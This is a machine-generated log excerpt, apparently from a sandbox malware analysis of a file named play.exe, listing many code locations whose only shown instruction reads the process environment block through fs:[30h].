Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C020 mov eax, dword ptr fs:[00000030h]	0_2_0268C020
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714000 mov ecx, dword ptr fs:[00000030h]	0_2_02714000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026980E9 mov eax, dword ptr fs:[00000030h]	0_2_026980E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A0E3 mov ecx, dword ptr fs:[00000030h]	0_2_0268A0E3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027160E0 mov eax, dword ptr fs:[00000030h]	0_2_027160E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C0F0 mov eax, dword ptr fs:[00000030h]	0_2_0268C0F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D20F0 mov ecx, dword ptr fs:[00000030h]	0_2_026D20F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027120DE mov eax, dword ptr fs:[00000030h]	0_2_027120DE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026880A0 mov eax, dword ptr fs:[00000030h]	0_2_026880A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027560B8 mov eax, dword ptr fs:[00000030h]	0_2_027560B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027560B8 mov ecx, dword ptr fs:[00000030h]	0_2_027560B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027280A8 mov eax, dword ptr fs:[00000030h]	0_2_027280A8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269208A mov eax, dword ptr fs:[00000030h]	0_2_0269208A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764164 mov eax, dword ptr fs:[00000030h]	0_2_02764164
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764164 mov eax, dword ptr fs:[00000030h]	0_2_02764164
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02728158 mov eax, dword ptr fs:[00000030h]	0_2_02728158
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov ecx, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h]	0_2_02724144
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696154 mov eax, dword ptr fs:[00000030h]	0_2_02696154
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696154 mov eax, dword ptr fs:[00000030h]	0_2_02696154
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C156 mov eax, dword ptr fs:[00000030h]	0_2_0268C156
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0124 mov eax, dword ptr fs:[00000030h]	0_2_026C0124
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02750115 mov eax, dword ptr fs:[00000030h]	0_2_02750115
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov ecx, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h]	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h]	0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027661E5 mov eax, dword ptr fs:[00000030h]	0_2_027661E5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C01F8 mov eax, dword ptr fs:[00000030h]	0_2_026C01F8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov ecx, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027561C3 mov eax, dword ptr fs:[00000030h]	0_2_027561C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027561C3 mov eax, dword ptr fs:[00000030h]	0_2_027561C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D0185 mov eax, dword ptr fs:[00000030h]	0_2_026D0185
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h]	0_2_0271019F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734180 mov eax, dword ptr fs:[00000030h]	0_2_02734180
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734180 mov eax, dword ptr fs:[00000030h]	0_2_02734180
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C188 mov eax, dword ptr fs:[00000030h]	0_2_0274C188
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C188 mov eax, dword ptr fs:[00000030h]	0_2_0274C188
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA660 mov eax, dword ptr fs:[00000030h]	0_2_026CA660
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA660 mov eax, dword ptr fs:[00000030h]	0_2_026CA660
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C2674 mov eax, dword ptr fs:[00000030h]	0_2_026C2674
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275866E mov eax, dword ptr fs:[00000030h]	0_2_0275866E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275866E mov eax, dword ptr fs:[00000030h]	0_2_0275866E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AC640 mov eax, dword ptr fs:[00000030h]	0_2_026AC640
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269262C mov eax, dword ptr fs:[00000030h]	0_2_0269262C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C6620 mov eax, dword ptr fs:[00000030h]	0_2_026C6620
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8620 mov eax, dword ptr fs:[00000030h]	0_2_026C8620
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE627 mov eax, dword ptr fs:[00000030h]	0_2_026AE627
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2619 mov eax, dword ptr fs:[00000030h]	0_2_026D2619
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E609 mov eax, dword ptr fs:[00000030h]	0_2_0270E609
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027106F1 mov eax, dword ptr fs:[00000030h]	0_2_027106F1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027106F1 mov eax, dword ptr fs:[00000030h]	0_2_027106F1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA6C7 mov ebx, dword ptr fs:[00000030h]	0_2_026CA6C7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA6C7 mov eax, dword ptr fs:[00000030h]	0_2_026CA6C7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC6A6 mov eax, dword ptr fs:[00000030h]	0_2_026CC6A6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C66B0 mov eax, dword ptr fs:[00000030h]	0_2_026C66B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694690 mov eax, dword ptr fs:[00000030h]	0_2_02694690
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694690 mov eax, dword ptr fs:[00000030h]	0_2_02694690
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698770 mov eax, dword ptr fs:[00000030h]	0_2_02698770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov esi, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov eax, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov eax, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714755 mov eax, dword ptr fs:[00000030h]	0_2_02714755
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E75D mov eax, dword ptr fs:[00000030h]	0_2_0271E75D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690750 mov eax, dword ptr fs:[00000030h]	0_2_02690750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2750 mov eax, dword ptr fs:[00000030h]	0_2_026D2750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2750 mov eax, dword ptr fs:[00000030h]	0_2_026D2750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270C730 mov eax, dword ptr fs:[00000030h]	0_2_0270C730
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC720 mov eax, dword ptr fs:[00000030h]	0_2_026CC720
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC720 mov eax, dword ptr fs:[00000030h]	0_2_026CC720
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov eax, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov ecx, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov eax, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC700 mov eax, dword ptr fs:[00000030h]	0_2_026CC700
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690710 mov eax, dword ptr fs:[00000030h]	0_2_02690710
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0710 mov eax, dword ptr fs:[00000030h]	0_2_026C0710
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E7E1 mov eax, dword ptr fs:[00000030h]	0_2_0271E7E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026947FB mov eax, dword ptr fs:[00000030h]	0_2_026947FB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026947FB mov eax, dword ptr fs:[00000030h]	0_2_026947FB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269C7C0 mov eax, dword ptr fs:[00000030h]	0_2_0269C7C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027107C3 mov eax, dword ptr fs:[00000030h]	0_2_027107C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026907AF mov eax, dword ptr fs:[00000030h]	0_2_026907AF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027447A0 mov eax, dword ptr fs:[00000030h]	0_2_027447A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273678E mov eax, dword ptr fs:[00000030h]	0_2_0273678E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C460 mov ecx, dword ptr fs:[00000030h]	0_2_0271C460
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268847D mov eax, dword ptr fs:[00000030h]	0_2_0268847D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268847D mov eax, dword ptr fs:[00000030h]	0_2_0268847D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A456 mov eax, dword ptr fs:[00000030h]	0_2_0274A456
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B245A mov eax, dword ptr fs:[00000030h]	0_2_026B245A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268645D mov eax, dword ptr fs:[00000030h]	0_2_0268645D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C427 mov eax, dword ptr fs:[00000030h]	0_2_0268C427
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026904E5 mov ecx, dword ptr fs:[00000030h]	0_2_026904E5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271A4B0 mov eax, dword ptr fs:[00000030h]	0_2_0271A4B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026964AB mov eax, dword ptr fs:[00000030h]	0_2_026964AB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C44B0 mov ecx, dword ptr fs:[00000030h]	0_2_026C44B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A49A mov eax, dword ptr fs:[00000030h]	0_2_0274A49A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698550 mov eax, dword ptr fs:[00000030h]	0_2_02698550
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698550 mov eax, dword ptr fs:[00000030h]	0_2_02698550
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726500 mov eax, dword ptr fs:[00000030h]	0_2_02726500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC5ED mov eax, dword ptr fs:[00000030h]	0_2_026CC5ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC5ED mov eax, dword ptr fs:[00000030h]	0_2_026CC5ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026925E0 mov eax, dword ptr fs:[00000030h]	0_2_026925E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE5CF mov eax, dword ptr fs:[00000030h]	0_2_026CE5CF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE5CF mov eax, dword ptr fs:[00000030h]	0_2_026CE5CF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026965D0 mov eax, dword ptr fs:[00000030h]	0_2_026965D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA5D0 mov eax, dword ptr fs:[00000030h]	0_2_026CA5D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA5D0 mov eax, dword ptr fs:[00000030h]	0_2_026CA5D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B45B1 mov eax, dword ptr fs:[00000030h]	0_2_026B45B1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B45B1 mov eax, dword ptr fs:[00000030h]	0_2_026B45B1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4588 mov eax, dword ptr fs:[00000030h]	0_2_026C4588
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692582 mov eax, dword ptr fs:[00000030h]	0_2_02692582
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692582 mov ecx, dword ptr fs:[00000030h]	0_2_02692582
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE59C mov eax, dword ptr fs:[00000030h]	0_2_026CE59C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270CA72 mov eax, dword ptr fs:[00000030h]	0_2_0270CA72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270CA72 mov eax, dword ptr fs:[00000030h]	0_2_0270CA72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
